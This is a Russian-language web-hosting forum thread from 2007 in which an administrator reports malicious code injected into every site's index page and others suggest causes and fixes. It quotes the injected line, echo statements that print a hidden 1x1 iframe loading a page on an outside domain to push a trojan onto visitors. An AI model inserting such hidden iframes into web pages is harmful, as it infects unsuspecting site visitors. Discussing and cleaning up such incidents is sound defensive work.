Добрый день!
Мы встречали такую проблему у других хостеров. До сих пор определить причину не удалось.
Пришлите пожалуйста ваши координаты, чтоб связаться с вами напрямую. Вместе мы можем попытаться установить источник проблемы.Предположительно два варианта:
1) утечка базы паролей пользователей.
2) подслушивание ftp-сессии на крупном маршрутизаторе.
С уважением,
Виталий
>>На сервере возможно стоит троянец.
>>Это изменение действительно прошло на индексных страницах _всех_ виртуальных хостов?
>>Даты модификации файлов есть? Они совпадают?
>>
>>>Здравствуйте.
>>>На всех индексных страницах вирт. хостов появилась строка:
>>>echo "";echo "";echo "";echo "";echo "<iframe src='http://www.radiodeejay.hr/forum/lang/inexed.htm' width=1 height=1></iframe>";
>>>
>>>Может кто-нибудь знает каким образом? Как от этого избавиться? Потому что человек
>>>который попадает на сайт засасывает к себе трояна !!! :(((
>>>
>>>Заранее спасибо.
>
>на некоторых индексных страницах их нет.
>после удаления строки с ифрэймом она появляется снова.
>Посмотрел по логам ftp сервера увидел ип которым модифицировались все индексные страницы.
>
>Загнал его в фаерволом в бан. Есть мысль запустить ftp сервер на
>нестандартном порту и сменить ftp пароли.
>Может еще что посоветуете?
Вариант для распечатки
WEB технологии (Public)
(ok) on 21-Май-07, 13:36 
